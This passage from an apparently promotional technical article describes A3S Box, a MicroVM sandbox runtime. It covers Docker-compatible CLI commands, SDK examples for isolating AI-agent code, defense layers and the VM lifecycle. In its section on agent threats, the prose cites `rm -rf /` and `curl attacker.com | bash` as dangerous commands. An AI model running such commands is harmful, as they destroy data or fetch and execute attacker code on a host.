&lt;p&gt;Core warm pool parameters:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;code&gt;min_idle&lt;/code&gt;: Minimum number of idle VMs (default 1)&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;max_size&lt;/code&gt;: Maximum number of VMs in the pool (default 5)&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;idle_ttl_secs&lt;/code&gt;: Idle VM time-to-live (default 300 seconds)&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The warm pool also integrates an auto-scaler (&lt;code&gt;PoolScaler&lt;/code&gt;) that dynamically adjusts &lt;code&gt;min_idle&lt;/code&gt; based on hit/miss rates within a sliding window:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;When the miss rate exceeds &lt;code&gt;scale_up_threshold&lt;/code&gt; (default 0.3), increase the number of pre-warmed VMs&lt;/li&gt;
&lt;li&gt;When the miss rate falls below &lt;code&gt;scale_down_threshold&lt;/code&gt; (default 0.05), decrease the number of pre-warmed VMs&lt;/li&gt;
&lt;li&gt;A cooldown period (default 60 seconds) prevents frequent oscillation&lt;/li&gt;
&lt;/ul&gt;




&lt;h2&gt;
  
  
  7. Core Value 4: Full Docker-Compatible Experience
&lt;/h2&gt;

&lt;h3&gt;
  
  
  7.1 52 Docker-Compatible Commands
&lt;/h3&gt;

&lt;p&gt;A3S Box provides 52 Docker CLI-compatible commands, covering all aspects of container lifecycle management. Developers can seamlessly migrate existing Docker workflows to A3S Box without modifying scripts or learning new command syntax.&lt;/p&gt;

&lt;p&gt;Core command examples:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Run a MicroVM (equivalent to docker run)&lt;/span&gt;
a3s-box run &lt;span class="nt"&gt;-d&lt;/span&gt; &lt;span class="nt"&gt;--name&lt;/span&gt; my-app &lt;span class="nt"&gt;-p&lt;/span&gt; 8080:80 nginx:latest

&lt;span class="c"&gt;# Execute a command (equivalent to docker exec)&lt;/span&gt;
a3s-box &lt;span class="nb"&gt;exec &lt;/span&gt;my-app &lt;span class="nb"&gt;cat&lt;/span&gt; /etc/nginx/nginx.conf

&lt;span class="c"&gt;# Interactive terminal (equivalent to docker exec -it)&lt;/span&gt;
a3s-box &lt;span class="nb"&gt;exec&lt;/span&gt; &lt;span class="nt"&gt;-it&lt;/span&gt; my-app /bin/bash

&lt;span class="c"&gt;# View logs&lt;/span&gt;
a3s-box logs my-app

&lt;span class="c"&gt;# List running MicroVMs&lt;/span&gt;
a3s-box ps

&lt;span class="c"&gt;# Stop and remove&lt;/span&gt;
a3s-box stop my-app
a3s-box &lt;span class="nb"&gt;rm &lt;/span&gt;my-app

&lt;span class="c"&gt;# Image management&lt;/span&gt;
a3s-box images
a3s-box pull ubuntu:22.04
a3s-box push myregistry.io/my-image:v1

&lt;span class="c"&gt;# Network management&lt;/span&gt;
a3s-box network create my-network
a3s-box network connect my-network my-app

&lt;span class="c"&gt;# Volume management&lt;/span&gt;
a3s-box volume create my-data
a3s-box run &lt;span class="nt"&gt;-v&lt;/span&gt; my-data:/data my-app

&lt;span class="c"&gt;# Audit query&lt;/span&gt;
a3s-box audit &lt;span class="nt"&gt;--filter&lt;/span&gt; &lt;span class="s2"&gt;"action=exec"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  7.2 Why Is Compatibility So Important?
&lt;/h3&gt;

&lt;p&gt;From a technology adoption perspective, whether a new technology is widely accepted depends on two factors: &lt;strong&gt;value increment&lt;/strong&gt; and &lt;strong&gt;migration cost&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;A3S Box's value increment is enormous — upgrading from shared-kernel isolation to hardware-level isolation, with optional confidential computing. But if the migration cost is equally enormous (needing to rewrite all deployment scripts, learn a completely new CLI, change team workflows), most teams will choose to stay with existing solutions.&lt;/p&gt;

&lt;p&gt;By providing a Docker-compatible CLI, A3S Box reduces migration cost to a minimum:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Before migration&lt;/span&gt;
docker run &lt;span class="nt"&gt;-d&lt;/span&gt; &lt;span class="nt"&gt;--name&lt;/span&gt; app &lt;span class="nt"&gt;-p&lt;/span&gt; 8080:80 nginx

&lt;span class="c"&gt;# After migration (just replace the command name)&lt;/span&gt;
a3s-box run &lt;span class="nt"&gt;-d&lt;/span&gt; &lt;span class="nt"&gt;--name&lt;/span&gt; app &lt;span class="nt"&gt;-p&lt;/span&gt; 8080:80 nginx
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This is not just a command name replacement. A3S Box is compatible with Docker's image format (OCI standard), network model, volume mount semantics, and environment variable passing. Existing Dockerfiles can be used without modification.&lt;/p&gt;




&lt;h2&gt;
  
  
  8. Core Value 5: Secure Isolation Sandbox for AI Agents
&lt;/h2&gt;

&lt;h3&gt;
  
  
  8.1 Security Challenges in the AI Agent Era
&lt;/h3&gt;

&lt;p&gt;Large language model (LLM)-driven AI Agents are evolving from "conversational assistants" to "autonomous executors" — they not only generate text, but can also write code, call tools, manipulate filesystems, and initiate network requests. This leap in capability brings entirely new security challenges:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Untrusted code execution.&lt;/strong&gt; Code generated by AI Agents is inherently untrusted. Even the most advanced LLMs may generate malicious code due to hallucination, prompt injection, or adversarial inputs. Executing such code in an unprotected environment is equivalent to handing control of the host machine to an unpredictable entity.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Side effects of tool calls.&lt;/strong&gt; Agents interact with the external world through tools — executing shell commands, reading/writing files, accessing databases, calling APIs. Each tool call may produce irreversible side effects. If an Agent directly executes &lt;code&gt;rm -rf /&lt;/code&gt; or &lt;code&gt;curl attacker.com | bash&lt;/code&gt; on the host machine, the consequences would be catastrophic.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Multi-tenant Agent platforms.&lt;/strong&gt; SaaS platforms run Agents from different users, each with different permission levels and trust levels. A malicious user's Agent should not be able to affect other users' Agents or the platform itself.&lt;/p&gt;

&lt;h3&gt;
  
  
  8.2 Why Traditional Containers Are Not Enough?
&lt;/h3&gt;

&lt;p&gt;Many AI Agent frameworks use Docker containers as sandboxes. But as analyzed in Section 1, traditional container isolation is based on the shared-kernel namespace mechanism — a single kernel vulnerability can allow malicious code generated by an Agent to escape to the host machine.&lt;/p&gt;

&lt;p&gt;For AI Agent scenarios, this risk is amplified:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Larger attack surface&lt;/strong&gt;: Agents may execute arbitrary syscalls, increasing the probability of probing kernel vulnerabilities&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Higher attack frequency&lt;/strong&gt;: Agents continuously generate and execute code, with each execution being a potential attack attempt&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Higher attack intelligence&lt;/strong&gt;: LLMs have the ability to understand and exploit vulnerabilities, unlike traditional random fuzzing&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;A3S Box's MicroVM isolation fundamentally solves this problem — even if code generated by an Agent exploits a zero-day Linux kernel vulnerability, it cannot break through the hardware virtualization boundary.&lt;/p&gt;

&lt;h3&gt;
  
  
  8.3 SDK-Driven Sandbox Integration
&lt;/h3&gt;

&lt;p&gt;A3S Box is not just a command-line tool, but an embeddable sandbox runtime. Through Rust/Python/TypeScript SDKs, AI Agent frameworks can integrate A3S Box directly into their own code as a library:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Python Agent framework integration example:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="kn"&gt;from&lt;/span&gt; &lt;span class="n"&gt;a3s_box&lt;/span&gt; &lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;BoxSdk&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;SandboxOptions&lt;/span&gt;

&lt;span class="k"&gt;class&lt;/span&gt; &lt;span class="nc"&gt;SecureAgentExecutor&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
    &lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;__init__&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
        &lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;sdk&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nc"&gt;BoxSdk&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;

    &lt;span class="k"&gt;async&lt;/span&gt; &lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;execute_agent_code&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;code&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;str&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;language&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;str&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;python&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
        &lt;span class="sh"&gt;"""&lt;/span&gt;&lt;span class="s"&gt;Execute Agent-generated code in an isolated sandbox&lt;/span&gt;&lt;span class="sh"&gt;"""&lt;/span&gt;

        &lt;span class="c1"&gt;# Create a one-time sandbox (independent MicroVM)
&lt;/span&gt;        &lt;span class="n"&gt;sandbox&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;sdk&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;create&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nc"&gt;SandboxOptions&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;
            &lt;span class="n"&gt;image&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="sa"&gt;f&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;language&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="s"&gt;:3.11&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
            &lt;span class="n"&gt;vcpus&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="mi"&gt;2&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
            &lt;span class="n"&gt;memory_mib&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="mi"&gt;512&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
        &lt;span class="p"&gt;))&lt;/span&gt;

        &lt;span class="c1"&gt;# Execute untrusted code in the sandbox
&lt;/span&gt;        &lt;span class="n"&gt;result&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;sandbox&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;exec&lt;/span&gt;&lt;span class="p"&gt;([&lt;/span&gt;&lt;span class="n"&gt;language&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;-c&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;code&lt;/span&gt;&lt;span class="p"&gt;])&lt;/span&gt;

        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
            &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;stdout&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="n"&gt;result&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;stdout&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
            &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;stderr&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="n"&gt;result&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;stderr&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
            &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;exit_code&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="n"&gt;result&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;exit_code&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
        &lt;span class="p"&gt;}&lt;/span&gt;
        &lt;span class="c1"&gt;# sandbox is automatically destroyed when scope ends
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;TypeScript Agent framework integration example:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight typescript"&gt;&lt;code&gt;&lt;span class="k"&gt;import&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="nx"&gt;BoxSdk&lt;/span&gt; &lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="k"&gt;from&lt;/span&gt; &lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;@a3s/box&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

&lt;span class="kd"&gt;class&lt;/span&gt; &lt;span class="nc"&gt;SecureToolExecutor&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;private&lt;/span&gt; &lt;span class="nx"&gt;sdk&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="k"&gt;new&lt;/span&gt; &lt;span class="nc"&gt;BoxSdk&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;

    &lt;span class="k"&gt;async&lt;/span&gt; &lt;span class="nf"&gt;executeShellCommand&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;command&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="kr"&gt;string&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt; &lt;span class="nb"&gt;Promise&lt;/span&gt;&lt;span class="o"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nx"&gt;ToolResult&lt;/span&gt;&lt;span class="o"&gt;&amp;gt;&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="c1"&gt;// Each tool call executes in an independent MicroVM&lt;/span&gt;
        &lt;span class="kd"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;sandbox&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="k"&gt;await&lt;/span&gt; &lt;span class="k"&gt;this&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;sdk&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;create&lt;/span&gt;&lt;span class="p"&gt;({&lt;/span&gt;
            &lt;span class="na"&gt;image&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;ubuntu:22.04&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
            &lt;span class="na"&gt;vcpus&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
            &lt;span class="na"&gt;memoryMib&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="mi"&gt;256&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
        &lt;span class="p"&gt;});&lt;/span&gt;

        &lt;span class="kd"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;output&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="k"&gt;await&lt;/span&gt; &lt;span class="nx"&gt;sandbox&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;exec&lt;/span&gt;&lt;span class="p"&gt;([&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;bash&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;-c&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;command&lt;/span&gt;&lt;span class="p"&gt;]);&lt;/span&gt;

        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
            &lt;span class="na"&gt;success&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nx"&gt;output&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;exitCode&lt;/span&gt; &lt;span class="o"&gt;===&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
            &lt;span class="na"&gt;output&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nx"&gt;output&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;stdout&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
            &lt;span class="na"&gt;error&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nx"&gt;output&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;stderr&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
        &lt;span class="p"&gt;};&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The key advantage of this integration pattern is: &lt;strong&gt;each code execution takes place in a brand new, isolated MicroVM&lt;/strong&gt;. Even if an Agent performs destructive operations in one execution (deleting files, modifying system configuration), it only affects that MicroVM itself — the next execution will start in a clean environment.&lt;/p&gt;

&lt;h3&gt;
  
  
  8.4 Warm Pool Accelerates Agent Response
&lt;/h3&gt;

&lt;p&gt;AI Agents typically follow a "think-execute-observe" loop — the Agent generates code, executes it, observes the output, then decides the next step. The speed of this loop directly affects user experience.&lt;/p&gt;

&lt;p&gt;If each execution requires a 200ms cold start, an Agent task with 10 tool calls would add 2 seconds of extra latency. The warm pool mechanism plays a key role here:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Without warm pool:  [200ms start] [exec] [200ms start] [exec] [200ms start] [exec] ...
                                                    Total extra latency: N x 200ms

With warm pool:     [~0ms acquire] [exec] [~0ms acquire] [exec] [~0ms acquire] [exec] ...
                                                    Total extra latency: ~0ms
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The warm pool's auto-scaling is particularly suited for Agent scenarios — Agent tool calls are typically bursty (dense calls during a task, idle between tasks), and &lt;code&gt;PoolScaler&lt;/code&gt; automatically adjusts the number of pre-warmed VMs based on hit rate.&lt;/p&gt;

&lt;h3&gt;
  
  
  8.5 Seven-Layer Defense Against Agent Threats
&lt;/h3&gt;

&lt;p&gt;Each layer of A3S Box's seven-layer defense-in-depth has a clear defensive target in AI Agent scenarios:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Defense Layer&lt;/th&gt;
&lt;th&gt;Agent Threat Countered&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Hardware virtualization&lt;/td&gt;
&lt;td&gt;Agent exploiting kernel vulnerabilities to escape&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;TEE memory encryption&lt;/td&gt;
&lt;td&gt;Agent attempting to read other tenants' memory data&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Independent kernel&lt;/td&gt;
&lt;td&gt;Agent's kernel-level attacks don't affect other sandboxes&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Namespaces&lt;/td&gt;
&lt;td&gt;Agent cannot see processes and files outside the sandbox&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Capability stripping&lt;/td&gt;
&lt;td&gt;Agent cannot perform privileged operations (e.g., mounting devices)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Seccomp BPF&lt;/td&gt;
&lt;td&gt;Agent cannot call dangerous syscalls (e.g., &lt;code&gt;kexec_load&lt;/code&gt;)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;no-new-privileges&lt;/td&gt;
&lt;td&gt;Agent cannot escalate privileges via SUID binaries&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;h3&gt;
  
  
  8.6 Auditing and Compliance
&lt;/h3&gt;

&lt;p&gt;In AI Agent platforms, audit capability is not only a security requirement but also a compliance requirement. Regulators are increasingly focused on the traceability of AI systems — "What did the AI do? When? What was the result?"&lt;/p&gt;

&lt;p&gt;A3S Box's 26 audit operations completely record every action of an Agent:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Which sandboxes the Agent created (&lt;code&gt;Create&lt;/code&gt;)&lt;/li&gt;
&lt;li&gt;Which commands the Agent executed (&lt;code&gt;Command&lt;/code&gt;)&lt;/li&gt;
&lt;li&gt;Which images the Agent pulled (&lt;code&gt;Pull&lt;/code&gt;)&lt;/li&gt;
&lt;li&gt;Whether the Agent's operations succeeded (&lt;code&gt;Success&lt;/code&gt; / &lt;code&gt;Failure&lt;/code&gt; / &lt;code&gt;Denied&lt;/code&gt;)&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;These audit logs are stored in structured JSON-lines format and can be imported into any log analysis system for post-hoc review.&lt;/p&gt;

&lt;h3&gt;
  
  
  8.7 Lightweight Deployment: ~40MB Complete Runtime
&lt;/h3&gt;

&lt;p&gt;The compiled binary size of A3S Box is only about 40MB — this includes the complete CLI, runtime, OCI image processing, TEE support, network management, warm pool, audit system, and all other functionality.&lt;/p&gt;

&lt;p&gt;The significance of this number:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Compared to Docker Engine&lt;/strong&gt;: Docker's full installation exceeds 200MB and requires multiple components like containerd and runc&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Compared to QEMU&lt;/strong&gt;: QEMU's installation package typically exceeds 100MB and depends on many dynamic libraries&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Edge deployment friendly&lt;/strong&gt;: A 40MB single binary can be easily deployed to IoT devices, edge nodes, and other storage-constrained environments&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Minimal container image&lt;/strong&gt;: A3S Box itself can be packaged as a minimal container image, making it easy to deploy as a DaemonSet in Kubernetes&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;This extreme binary size is thanks to Rust's zero-cost abstractions and compile-time optimization — no runtime virtual machine, no garbage collector, no large standard library runtime. The statically linked Guest Init binary is only a few MB, ensuring a minimal attack surface inside the MicroVM.&lt;/p&gt;

&lt;p&gt;For AI Agent platforms, lightweight deployment means A3S Box can be quickly deployed on each compute node without consuming precious disk space and network bandwidth. Combined with the warm pool mechanism, the entire system can scale from zero to hundreds of isolated sandboxes within minutes.&lt;/p&gt;




&lt;h2&gt;
  
  
  9. Deep Dive: VM Lifecycle State Machine
&lt;/h2&gt;

&lt;h3&gt;
  
  
  9.1 BoxState State Machine
&lt;/h3&gt;

&lt;p&gt;A3S Box uses a strictly defined state machine to manage the lifecycle of each MicroVM. The state machine implements concurrency-safe state synchronization through &lt;code&gt;RwLock&lt;/code&gt;:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Created --&amp;gt; Ready --&amp;gt; Busy --&amp;gt; Ready
   |          |         |        |
   |          |         |        +--&amp;gt; Compacting --&amp;gt; Ready
   |          |         |
   |          +---------+-----------&amp;gt; Stopped
   |
   +-----------------------------------&amp;gt; Stopped
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;State meanings:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Created&lt;/strong&gt;: VM configuration has been generated but not yet started. At this point, &lt;code&gt;InstanceSpec&lt;/code&gt; has been fully constructed, containing vCPU count, memory size, rootfs path, entrypoint, network configuration, TEE configuration, and all other parameters.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Ready&lt;/strong&gt;: VM has started and is ready to accept commands. Guest Init has completed initialization, and vsock servers are listening.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Busy&lt;/strong&gt;: VM is executing a command (exec or PTY session). In this state, new command requests are queued.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Compacting&lt;/strong&gt;: VM is performing internal maintenance operations (such as log rotation, cache cleanup). This is a brief transitional state.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Stopped&lt;/strong&gt;: VM has stopped. Can transition to this state from any state (normal shutdown or abnormal termination).&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  9.2 VmController Startup Flow in Detail
&lt;/h3&gt;

&lt;p&gt;&lt;code&gt;VmController&lt;/code&gt; is the default implementation of the &lt;code&gt;VmmProvider&lt;/code&gt; trait, responsible for transforming an &lt;code&gt;InstanceSpec&lt;/code&gt; into a running MicroVM:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight rust"&gt;&lt;code&gt;&lt;span class="c1"&gt;// Simplified startup flow&lt;/span&gt;
&lt;span class="k"&gt;impl&lt;/span&gt; &lt;span class="n"&gt;VmmProvider&lt;/span&gt; &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;VmController&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;async&lt;/span&gt; &lt;span class="k"&gt;fn&lt;/span&gt; &lt;span class="nf"&gt;start&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="k"&gt;self&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;spec&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="n"&gt;InstanceSpec&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="k"&gt;-&amp;gt;&lt;/span&gt; &lt;span class="nb"&gt;Result&lt;/span&gt;&lt;span class="o"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nb"&gt;Box&lt;/span&gt;&lt;span class="o"&gt;&amp;lt;&lt;/span&gt;&lt;span class="k"&gt;dyn&lt;/span&gt; &lt;span class="n"&gt;VmHandler&lt;/span&gt;&lt;span class="o"&gt;&amp;gt;&amp;gt;&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="c1"&gt;// 1. Locate shim binary&lt;/span&gt;
        &lt;span class="k"&gt;let&lt;/span&gt; &lt;span class="n"&gt;shim_path&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="k"&gt;Self&lt;/span&gt;&lt;span class="p"&gt;::&lt;/span&gt;&lt;span class="nf"&gt;find_shim&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;&lt;span class="o"&gt;?&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

        &lt;span class="c1"&gt;// 2. macOS: ensure hypervisor entitlement&lt;/span&gt;
        &lt;span class="nd"&gt;#[cfg(target_os&lt;/span&gt; &lt;span class="nd"&gt;=&lt;/span&gt; &lt;span class="s"&gt;"macos"&lt;/span&gt;&lt;span class="nd"&gt;)]&lt;/span&gt;
